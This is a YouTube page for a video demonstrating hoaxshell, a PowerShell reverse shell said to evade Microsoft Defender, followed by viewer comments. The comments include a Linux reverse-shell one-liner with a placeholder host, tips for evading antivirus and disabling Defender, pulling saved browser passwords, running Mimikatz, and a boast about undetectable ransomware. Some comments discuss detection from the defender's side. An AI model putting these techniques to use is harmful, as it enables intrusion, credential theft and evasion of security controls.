Reverse Shell UNDETECTED by Microsoft Defender (hoaxshell)

  • Published: 22 Aug 2024
  • j-h.io/plextrac SUPER thankful for PlexTrac for supporting the channel and sponsoring this video -- try their premiere reporting & collaborative platform in a FREE one-month trial! Spend more time hacking, and less time reporting 😎
    Help the channel grow with a Like, Comment, & Subscribe!
    ❤️ Support ➡ j-h.io/patreon ↔ j-h.io/paypal ↔ j-h.io/buymeac...
    Check out the affiliates below for more free or discounted learning!
    🖥️ Zero-Point Security ➡ Certified Red Team Operator j-h.io/crto
    💻Zero-Point Security ➡ C2 Development with C# j-h.io/c2dev
    🐜Zero2Automated ➡ Ultimate Malware Reverse Engineering j-h.io/zero2auto
    🐜Zero2Automated ➡ MISP & Malware Sandbox j-h.io/zero2au...
    ⛳Point3 ESCALATE ➡ Top-Notch Capture the Flag Training j-h.io/escalate
    👨🏻‍💻7aSecurity ➡ Hacking Courses & Pentesting j-h.io/7asecurity
    📗Humble Bundle ➡ j-h.io/humbleb...
    🐶Snyk ➡ j-h.io/snyk
    🤹‍♀️SkillShare ➡ j-h.io/skillshare
    🌎Follow me! ➡ j-h.io/discord ↔ j-h.io/twitter ↔ j-h.io/linkedin ↔ j-h.io/instagram ↔ j-h.io/tiktok
    📧Contact me! (I may be very slow to respond or completely unable to)
    🤝Sponsorship Inquiries ➡ j-h.io/sponsor...
    🚩 CTF Hosting Requests ➡ j-h.io/ctf
    🎤 Speaking Requests ➡ j-h.io/speaking
    💥 Malware Submission ➡ j-h.io/malware
    ❓ Everything Else ➡ j-h.io/etc

Comments • 311

  • @HaxorTechTones · 1 year ago · +181

    Thank you from the heart for making this, John!
    Heads up for the people watching this: hoaxshell's payload won't work in constrained language mode due to the method invocation error. The shell is actually established, but as it utilizes POST requests to send each command's output back to the attacker, it gets cut off. It could work (in theory) if the output was sent back to the attacker via GET, which of course would require modifying the tool and finding a workaround for the limited number of characters that can be transferred within a URL.

    • @NahImPro · 1 year ago · +6

      This is awesome to have the provider of this script comment on your channel John. You’re awesome man you motivate me daily.

    • @centdemeern1 · 1 year ago · +1

      Would you be able to put some of the stuff that doesn't fit into the URL into a header?

    • @HaxorTechTones · 1 year ago · +8

      @centdemeern1 you could, although I believe the best approach would be to split the cmd output into multiple GET requests (if output.length > 2064) and notify the hoaxshell server accordingly to combine a number of GET requests, e.g. via a custom header like "X-Combine: 5" or whatever. There's actually an unlimited amount of awesome things you could do by enriching the powershell payload, but the length of it is a major issue. I tried to keep the payloads generated by hoaxshell as short and compact as possible.

    • @centdemeern1 · 1 year ago · +2

      @HaxorTechTones I see, that makes sense.
      Maybe something like this could be a command line flag (ex. --constrained-language-mode) with a warning that it'll make the payload larger.
      If not, maybe I'll fork it or something. If I feel like it. Who knows.

    • @HaxorTechTones · 1 year ago · +4

      @centdemeern1 yeah I was actually thinking of adding exactly that in the next update.

  • @realelaverick · 1 year ago · +99

    I think the problem you're getting with the base64 decode is that it is encoded in UTF-16 but the Linux base64 -d command decodes to ASCII

    • @TheMAZZTer · 1 year ago · +8

      Probably encoded UTF-8, since it only encounters problems with one or two characters it seems. UTF-8 is compatible with ASCII until you use characters not in ASCII, which get encoded as double width or wider. Possibly sublime detected the resulting file as UTF-8 when ASCII would have been better, or something. Difficult to know exactly where things screwed up.

    • @handlemchandleson1 · 1 year ago · +6

      ❌He doesn't copy all of the B64 at 11:00 lol, that's why❌
      Edit: nah nvm

    • @beyondcatastrophe_ · 1 year ago · +1

      @handlemchandleson1 Not true. Also he's pasting there. If the base64 string was incomplete, there wouldn't be the == at the end

    • @LouisSerieusement · 1 year ago

      @beyondcatastrophe_ he forgot the first line at the top

    • @JeffNoel · 1 year ago · +1

      @handlemchandleson1 He doesn't use the pasted content though when he tries to select it within the payload.b64 file. He directly specifies base64 -d payload.b64 (which contains the full payload) instead of doing an echo "PasteStringHere" | base64 -d

  • @G-33k · 1 year ago · +31

    Only 2 guys are my favorite in the tech field on YouTube, John Hammond & David Bombal

    • @rafag9129 · 1 year ago · +9

      You’re forgetting @ippsec

    • @brandonevans5123 · 1 year ago · +6

      and LiveOverflow!

    • @48pluto · 1 year ago · +4

      @ippsec is probably not human LOL but certainly my best source into ethical hacking

    • @JustinBarfitt · 1 year ago · +5

      yeah, you can definitely replace Bombal on that list with a quality cyber sec channel... IPPSEC, HackerSploit, The Cyber Mentor, etc.

    • @MrDaveUsesWords · 1 year ago · +2

      No love for @jackrhysider ?

  • @Rojawa · 1 year ago · +14

    As a german, I have to admit... the X at 05:30 is SUS

    • @hctiBelttiL · 1 year ago

      It's left-handed, as opposed to what you're referring to. Probably a stylized Hindu sauwastika. It's also a character in Chinese and Japanese script, or it could be something else entirely. Aliens? Tire burns for monster trucks? The possibilities are endless!

  • @MsRebel411 · 1 year ago · +8

    Just found this channel last week and I'm loving it...

  • @DarkFaken · 1 year ago · +35

    Hey John, have you had a look at the cmdlet New-Module? I came across it today in the documentation, apparently it allows for creating script blocks in memory. Wondering if that would work similar to iex

  • @jxberrios · 1 year ago · +3

    John, you have NO idea how long I've been trying different mechanisms unsuccessfully and after watching this, I decided to try it out...and dude!!! This tool is definitely amazing!!

  • @Lampe2020 · 1 year ago · +3

    5:00 This commentary on the code is just hilarious!

  • @PostMeridianLyf · 1 year ago · +3

    I am 1000% addicted to your content! Please keep this coming, my brain is in love with you!

  • @cirklare · 1 year ago · +1

    You are right, PlexTrac
    Is making a difference in reporting process
    My first report at hacker1 was about open redirect in grab company
    (Asian version of UBER)
    With PlexTrac you can report in 15 minutes instead of 2 hours
    To get them to your point and explain what you did

  • @reynaldo7371 · 1 year ago · +10

    tried hoaxshell last month from a Kali VM to my main PC with Avast Premium Security enabled and updated. It freaked me out that Avast didn't detect anything, Windows Defender neither.

    • @elllieeeeeeeeeeeeeeeeeeeeeeeee · 1 year ago

      avast sucks

    • @reynaldo7371 · 1 year ago

      @elllieeeeeeeeeeeeeeeeeeeeeeeee got it for cheap, still better than Win Defender I guess

    • @reynaldo7371 · 1 year ago · +1

      @Fsociety I see what you mean, but... I know I won't let any stranger go inside my house, what I can do is at least lock the door.

  • @davidnagy4723 · 1 year ago · +1

    Hi John. As t3l3machus showed in one of his vids, hoaxshell actually still works with minimal modification to the base payload and gets through some free AV too.

  • @user-fq6ti2fg9n · 2 months ago

    I love the way you break things down 👍 in all your videos. Continue your hard work

  • @tom-on · 1 year ago · +3

    ngl the x in the logo do be looking kinda sus

  • @khaelkugler · 1 year ago · +1

    Hey John! Cool video--I do some red teaming and I'd like to know how you come across these reverse shells that bypass EDRs. Are there decent resources on the clearnet?

  • @Panda-wi9vf · 1 year ago · +2

    Looks like that Windows supporter watched your video. When cloud protection is on, Havoc's demon gets flagged as a trojan🤣🤣🤣

  • @danielruzicka3858 · 1 month ago

    I just tested it and it's already protected so you have to turn off the real-time protection. The thing is you just need it disabled for session initiation; if you turn it on again when the reverse shell is already set up, it won't crash, you can continue entering the commands.

  • @fv6566 · 1 year ago · +2

    Hoaxshell was able to bypass elastic endpoint. I am pleased lol.

  • @zaneaussie · 1 year ago · +3

    Awesome man! Now how to get it to run on a remote machine 😛

  • @lucawills · 1 year ago

    Thanks so much John! This worked really well for me on an HTB machine where the Windows machine had an AV that blocked all reverse shells I tried, except for the one shown in this video! Works amazingly :)

  • @purplesprout5774 · 1 year ago · +7

    great content John, I'd be interested as well in seeing how that looks from a threat hunting / defender PoV: how could I detect it, spawned processes, event logs, dropped files etc. If I had Sysmon running, what could I see in a SIEM?

    • @purplesprout5774 · 1 year ago · +3

      Should have said, alerting on obfuscated powershell in a SIEM would have detected that it ran

    • @abdullahyasin3055 · 1 year ago

      probably that powershell -e payload under the powershell process, we can hunt for that in Sysmon

    • @agsystems8220 · 1 year ago · +2

      @purplesprout5774 It would, but in the real world it probably wouldn't be obfuscated. It would be casually placed somewhere in a 'utility' that does something else. The code block that is running on the Windows machine is so simple that it probably almost exists in the wild for legitimate limited reasons. A legitimate app would not be a raw running of an expression fetched from somewhere, but it may parse some data from somewhere into part of an expression and run that. This still seems like a bad idea because if the parsing can be escaped it becomes a shell, but that doesn't mean it isn't done.
      The problem is that this simple demonstration is not the real problem (though script kiddies will abuse it). More of an issue is deliberately weak parsing in an otherwise functional application involving Invoke-Expression. Preventing the use of Invoke-Expression on retrieved data would not be backward compatible, while detecting buggy parsing is 'hard' due to parsing being a Turing complete problem.
      This demonstrates that any use of Invoke-Expression on data retrieved from a remote server is potentially a reverse shell. At best it is an attack surface, at worst a deliberate backdoor. I guess you could go through the uses of Invoke-Expression and try to characterise and whitelist legitimate ones. Automated detection is extremely hard though, due to 'doing anything' being Invoke-Expression working as intended.

  • @plasmasupremacy9321 · 1 year ago

    A bit of a silly comment but; the way your lighting is setup it casts shadows from your glasses that look kinda like winged eyeliner. And honestly, slay dude, you look great, haha

  • @fastmot1on · 1 year ago · +3

    You could probably edit that payload to ensure it grabs the system proxy settings and uses them, this way it should be usable from within enterprise networks.

    • @elllieeeeeeeeeeeeeeeeeeeeeeeee · 1 year ago · +1

      Enterprise networks probably would have a firewall

    • @Spelter · 1 year ago · +2

      @elllieeeeeeeeeeeeeeeeeeeeeeeee True, and a connection to port 80 instead of 8080 will be tunneled through the proxy, maybe 443 with SSL, and the firewall is not set up to decrypt the stream to inspect it. Could work; good enterprise networks do SSL inspection, but only if the host hasn't set up security measures like Google or Microsoft do.
      Problem is, like it always was, bringing the code into a system and executing it. You can't send a ps1 file and say "hey, here is a patch", because by default script execution is disabled and a warning pops up. You can send an exe file which starts a PowerShell process in the background, but how do you get your app to your victim.
      Still, a nice tool to know.

    • @geroffmilan3328 · 1 year ago

      @elllieeeeeeeeeeeeeeeeeeeeeeeee proxies exist to allow firewall bypass for specific protocols.
      Users are often restricted in terms of what they can access via the proxy - usually based on categories defined by the proxy vendor, unless the company chooses to micromanage on a per-URL basis.
      Admins, however, often have way fewer restrictions, and are a more valuable target anyway.
      The solution is threat-hunting: someone must ensure logs are gathered from the end user devices, proxies, firewalls, switches & every other element in the chain, then build alerts and actions based on content found across all of those log types.

  • @hackximus · 1 year ago · +13

    Unfortunately, it is already detected by Sophos AV. Three weeks ago it was still working. Unfortunately, it's already too well known. It is a matter of time before Windows Defender will detect the reverse shell. But cool project.

    • @syskey1402 · 1 year ago · +3

      yea, but if u modify the source code only a little and also obfuscate it in layers, maybe it could still bypass

    • @mentor_bajrami · 1 year ago · +5

      Unfortunately?

    • @hackximus · 1 year ago · +1

      @syskey1402 The problem is that many who watch John do not have the experience to analyze or read code and change it so that it then works. I fully agree with you that the change is not detected by the Sophos AV. Weekend task for me. 😜

    • @syskey1402 · 1 year ago

      @hackximus lol, yes

  • @yashprasad2639 · 1 year ago · +1

    Ppl don't understand that Windows Defender might be bad, but it does one thing that is really helpful: it tells us that an app is signed by a valid company, and if an app doesn't have a signature by a renowned company it's a really big red flag

  • @_JohnHammond · 1 year ago

    SUPER thankful for PlexTrac for supporting the channel and sponsoring this video -- try their premiere reporting & collaborative platform in a FREE one-month trial! Spend more time hacking, and less time reporting 😎j-h.io/plextrac

  • @spelz1751 · 1 year ago · +2

    AV picked it up real quick. Perhaps it has already been registered by defender as a threat.

    • @Gh0st_0723 · 1 year ago

      Yup but disabling it can be a part of the script.

  • @PhotoSlash · 1 year ago · +1

    update: it does get blocked by AV now

  • @slybandit8117 · 1 year ago

    This was cool, but in less than 7 months, Windows has made a patch for this. My newly created Win11 VM, with no updates AND most of Defender turned off was catching it. You must keep Real-Time Protection off (that's the only time I got a rev-shell), but it keeps turning itself back on now. I am updating the VM and I am going to try them again. Thanks for the vid! Awesome as always!

    • @BrickTamlandOfficial · 1 year ago · +2

      7 months lol is that supposed to be a brag about Windows security? lol

    • @outcome2715 · 5 months ago

      Easy to bypass, give it instructions to launch a user-level command prompt in the background (so the user doesn't see), obfuscate your new code so AV doesn't pick up on the command prompt command, inject it into a legit application (plenty of ways) and you're good to go.

    • @slybandit8117 · 5 months ago · +1

      @outcome2715 Cool. Thanks for the tips. You make it sound easy, I'll have to try a little harder.

    • @slybandit8117 · 5 months ago

      @BrickTamlandOfficial no. If anything the opposite. But no that's not at all why I said that. It was literally just the time that it was working then not.

  • @exeplays7212 · 1 year ago · +1

    That x is looking kinda SUS

  • @demon1058 · 1 year ago · +23

    I have created a data deleter ransomware that deletes the data within your files and you get a reverse shell after the deletion is completed, and it is undetectable; I ran the MRT scan and a Malwarebytes scan but none of them can detect it

    • @shinchanstheory8002 · 1 year ago · +1

      which language?

    • @zxchtl · 1 year ago · +13

      @shinchanstheory8002 scratch

    • @castroonie · 1 year ago · +1

      @shinchanstheory8002 golang

    • @surrender. · 1 year ago · +2

      @castroonie golang is automatically detected by every ac as a false positive

    • @demon1058 · 1 year ago · +3

      @shinchanstheory8002 python

  • @bugurah · 8 months ago · +3

    Guys it doesn't work anymore, try another one.

  • @Yadav-it3ku · 1 year ago · +1

    Hello @John Hammond sir
    I've tried Hoaxshell many times but it's not working... Can you check this out and please provide the solution. Every time I run the reverse shell, the defender detects the payload as malicious and throws an error.

  • @YachtyBurner · 1 year ago · +2

    that X in the thumbnail looked like a hindu swastika 😂😂

  • @swifty010 · 10 months ago

    lol watching a jh vid with a jh ad never seen this before

  • @disdroid · 1 year ago

    So presumably you would have control of the router and use that to deliver the payload and open a port for remote access but you still need to execute the powershell command on the target

    • @geroffmilan3328 · 1 year ago

      Executing code on a target is a trivial task, given the multitude of delivery methods ranging from phishing thru web-based scripts to USB disks or keyboard impersonators.
      If you can block all of those - and in theory it's not a bad idea - you'll end up in practice with a very limited-use computer, which might as well be running a RISC-based CPU & OS if it can still do its intended job in this state.

  • @catalinancutei5390 · 1 year ago · +5

    Isn't this just like you would type:
    sh -i >& /dev/tcp/some_ip_here/some_port 0>&1
    on a Linux host? I mean of course the antivirus wouldn't block it because it is the expected behaviour. What would then be the difference between you connecting to a reverse shell and your browser connecting to a web server? From what I know a reverse shell vulnerability is supposed to let you gain access to a host without having physical access to it (through a public web service or something).
    If I'm wrong or there is something I'm missing please correct me.

    • @_Slaze · 1 year ago · +1

      Windows defender uses AMSI to detect the execution of malicious PowerShell, like a reverse shell. The point of this is, you can use the undetected reverse shell as a communication method to your c2 Server like Malware often does

    • @catalinancutei5390 · 1 year ago

      @_Slaze I see

  • @Panda_miner_ytb · 3 months ago · +1

    Doesn't work anymore (tested on Windows 11 family edition , version 23H2) comment posted the 04/24/2024

  • @_hackwell · 1 year ago · +1

    awesome ! I'll use it on my next boxes for sure

  • @torsec6048 · 1 year ago · +1

    nice john this is the main reason you r my most fav youtube content creator

    • @Cossaw · 1 year ago · +1

      I saw this from you first! Good stuff

    • @torsec6048 · 1 year ago · +1

      @Cossaw thanks mate but John Hammond is great, all his videos are on a whole different level

  • @dadogwitdabignose · 1 year ago · +1

    the x in the video’s picture looks kinda sussy

  • @JayDag08 · 1 year ago

    No threat actors really use a single reverse shell in the wild. But it's good to see WD and other AVs get bypassed from time to time 😏

  • @caleboleary182 · 1 year ago

    John from the future has great hair

  • @viduraranathunga6000 · 1 year ago · +2

    Damn, why do I want to combine this with a HID attack??? Is it just me or are there others like me 🙄🙄🙄🙄

  • @Silencer1337 · 1 year ago · +1

    I fail to see what's there to detect about this. User opening Powershell and executing a malicious command is his problem, no?

  • @ThinhNguyen-lc2py · 1 year ago

    Hi John,
    Love all content you created.
    I'm learning Cyber; still finding a new laptop to work. Do you have any advice? May I ask what is ur device specifications?
    Best

  • @OneOfThePetes · 1 year ago

    Man, your hair grew quickly!

  • @prabhatjoshi602 · 1 year ago · +1

    I did try to replicate this and found out that this works only when the Defender toolkit isn't installed on the system. Mine was a Win 11 Enterprise eval edition similar to John's, and I saw that I needed to install a toolkit of some kind from Windows Update in Settings for Defender to start working. Maybe John's system didn't have that installed and so it bypassed it gracefully.

    • @draugh1r219 · 1 year ago

      Now the question is how many systems have it?

    • @prabhatjoshi602 · 1 year ago

      @draugh1r219 Yup, that is also true.

  • @itsaperionasentinel5446 · 1 year ago · +3

    3:30 did they really use a swastika for the “X?” Lol

  • @jakepanda209 · 1 year ago

    Hi John, how are you after a very long time watching your video? Amazing content, thank you

  • @chrisfahie2767 · 1 year ago · +1

    It's working thanks my friend

  • @filipomazic8823 · 1 year ago

    i think your b64 was weird because by default it uses utf8 and yours was encoded with utf16 by hoaxshell it seems.
    Let me know if I'm wrong
    Awesome vid btw

  • @henryd4968 · 1 year ago · +1

    Hi I am new to the topic and wanted to ask if it is theoretically possible to also not use his IP address for this but something else like a server?

  • @enovation-nl1205 · 1 year ago

    Pip install ipapi , made me laugh fucking hard hahah

  • @ThePowerRanger · 1 year ago

    Seems like Windows needs to get its security up.

  • @Just1n2802 · 1 year ago

    I understand what the thumbnail is saying, but man does that x look suspicious

  • @aymaneelhadi2954 · 1 year ago

    Hey man, It works great and without any problems.

  • @myfirsthak · 1 year ago

    Sweet. I will try this tonight. Sadly my antivirus windows 10 defender catches it but try the ducky script I posted
    still works.

  • @0xC4aE1e5 · 1 year ago

    I think the garbage text is ASCII, and PowerShell uses UTF16le.

  • @danielniedzwiecki638 · 1 year ago

    As always, everything is super. Waiting for new cheats from your side

  • @otakusong66 · 1 year ago

    You're really good at explaining, thank you

  • @oproadiakdajdbhjadajsld · 1 year ago

    doesn't work anymore.
    tested on a fully updated Win 11 machine (28/10/22)

  • @wtfdoiputhere · 1 year ago · +1

    I remember in Windows 10 i made a batch script that automatically ran as administrator so i could use powershell commands to download the payload from my server and exclude.exe from being scanned

    • @olivermejia3786 · 1 year ago · +1

      Great idea

    • @wtfdoiputhere · 1 year ago

      @olivermejia3786 I was honestly shocked how simple and effective it was, I even wrote a blog about it

    • @outlawnation5160 · 1 year ago

      @wtfdoiputhere exclude.exe?

    • @wtfdoiputhere · 1 year ago · +1

      @outlawnation5160 yes, using powershell commands you could tell Windows Defender to exclude certain folders or file types from being scanned

    • @outlawnation5160 · 1 year ago

      @wtfdoiputhere that's pretty powerful (no pun intended). Do you have a GitHub for the script?

  • @abepl · 1 year ago

    where should I start if I wanna get into pentesting (apart from experimenting myself)?

  • @matthewrichard6011 · 6 months ago

    My Windows 11 Pro guest is catching this

  • @ggdgfd9392 · 1 year ago

    Just simply put the code, it works! thanks!

  • @user-pb5tt7zu9g · 11 months ago

    Hello everyone, I cannot run the hoaxshell listener on the newest Ubuntu, it gives the error "No module named 'gnureadline'". New Python does not support gnureadline. How can I fix this, or how can I use hoaxshell on the newest Linux system?

  • @CenterZero_DeadSecurity · 1 year ago · +2

    How would you do reverse shells from outside the LAN? Port forwarding is too much effort xd

  • @crimsonmoon9404 · 1 year ago

    it's only a matter of time before more are found.

  • @idrissasow1595 · 1 year ago

    This tutorial is amazing and you are really good at teaching !! great job sir !

  • @tiktoknesia3657 · 1 year ago

    This exertion Hella good! Recommended

  • @himashhimash6017 · 1 year ago

    After havoc c2 ..... good one

  • @JayDag08 · 1 year ago

    I like the idea that the author released this on GitHub and then burns it as soon as it gets known.. 😆

  • @chrisfahie2767 · 1 year ago

    Worked , thanks a lot!

  • @svettnabb · 1 year ago

    Defender without the cloud options is basically worthless

  • @hypedz1495 · 1 year ago

    John.. John Hammond. Good content 👏

  • @ciloksejati4154 · 1 year ago

    wow discussed here👍

  • @RAJA-di5qj · 1 year ago

    Thanks teacher ji🇮🇳💫

  • @salman-si7me · 1 year ago

    Great video, very well explained - unfortunately two devices of mine are corrupted: hard disk errors, permissions, and the system keeps taking ownership!
    This is because PowerShell scripts are running automatically + unrestricted policy, and the BIOS is configured for WiFi as well. I can't connect again with my new device to my WiFi due to PowerShell and Kali being linked - if anyone has any ideas I would really appreciate it -

  • @feloxes · 1 year ago

    you can bypass Amsi and then do Mimikatz

  • @user-qc5hd6ih7q · 1 year ago

    one question, does the Windows machine have to be on the same network? I'm new in this area :)

  • @hballouz · 11 months ago

    in the video LAN IP addresses are used, what IP should be used if the payload is run on a computer outside my network? is it my public IP?

  • @KamKam-ym3do · 1 year ago

    theres three on my computer. they wont go away, contebrew, trickbot, "systen32" (not system systen)

  • @UsamaAli-kr2cw · 1 year ago

    I tried this one week before and it didn't work. The box had Deep Security enabled; I disabled the Deep Security agent, and Windows Defender was already disabled prior to my testing, but still it didn't work.

  • @harry2b2t · 1 year ago · +1

    wtf why is there a like swastika x in the name?

  • @thegoldenexploiter1802 · 1 year ago

    the x of hoaxshell is kinda strange

  • @rpmathur1278 · 4 months ago

    Can it work over the internet if we place a Cloudflare URL in place of the IP address?

  • @Bestcomebacks · 1 year ago · +1

    Now they start detecting it 😂

    • @48pluto · 1 year ago · +1

      Good

    • @DeNikow · 1 year ago

      It was already detected, John had to turn off cloud based protection for exactly that reason.

    • @SheIITear · 1 year ago · +1

      @DeNikow did you even watch the video lmao

  • @lancemarchetti8673 · 1 year ago · +1

    When will passwords allow for spaces and non-alpha numerics ?

    • @y.vinitsky6452 · 1 year ago

      Spaces probably never because of how databases and database connections work. Most allow special characters and some even full unicode

  • @kidpresident_1475 · 1 year ago · +1

    Patched in less than 10 days. 😔

  • @smokingone · 1 year ago

    Did you run powershell as an administrator? If so I don't see this software having any practical use besides possibly diagnostics. If you don't need an admin shell on the windows machine then it would be possible to write an autoexec.bat file and put it on a usb and then all it would take is a few moments access to the machine assuming the owner didn't disable autorun.

    • @wouter2754 · 1 year ago

      no powershell needed I think

  • @tntomega · 7 months ago

    but is it "stand alone"? or do I always need to send the exploit and be the listener

  • @skylark0534 · 1 year ago

    Sad it seems to be patched a few days ago

  • @KayvonGz · 1 year ago

    Undetected before this video that is 😂

  • @jondoe79 · 1 year ago

    Payload is encoded in base16

  • @udotcarter · 1 year ago

    How does Crowdstrike deal with this?

  • @TheDenysabner · 1 year ago

    Not working anymore.

  • @sapito169 · 1 year ago

    this is soo good that I feel guilty just to watch it

  • @codewithraiju1424 · 1 year ago · +1

    We can find a few reverse shells if we search a little that can bypass win defender.. The hard part is finding a rat with rdp

    • @Bruh-sp2bj · 1 year ago · +2

      what do you need rdp for? Just use the system shell

    • @codewithraiju1424 · 1 year ago

      @Bruh-sp2bj yeah. But there is a swag of rdp.. With shell we can do a lot but with rdp we can even get passwords stored in the browser of a victim..

    • @realavdhut · 1 year ago · +2

      @codewithraiju1424 bruh ? if you have a shell then just download the saved passwords/cookies from the browser directory stored locally with help of that shell

    • @codewithraiju1424 · 1 year ago

      @realavdhut yeah but I think they are encrypted, Aren't they?

    • @realavdhut · 1 year ago

      @codewithraiju1424 yeah they are .. but there are different methods to retrieve it ... for eg enum_chrome

  • @xvipexx7506 · 1 year ago · +1

    Min: 11:00 you didn't copy everything from the base64, no? Line 1 is missing if i'm seeing correctly

    • @handlemchandleson1 · 1 year ago

      That's what I was going to say, but it's cool it still partially decoded it

    • @SheIITear · 1 year ago

      he used the file to decode. also, the way base64 works, the first part of the decoded text would've been broken, not the middle part.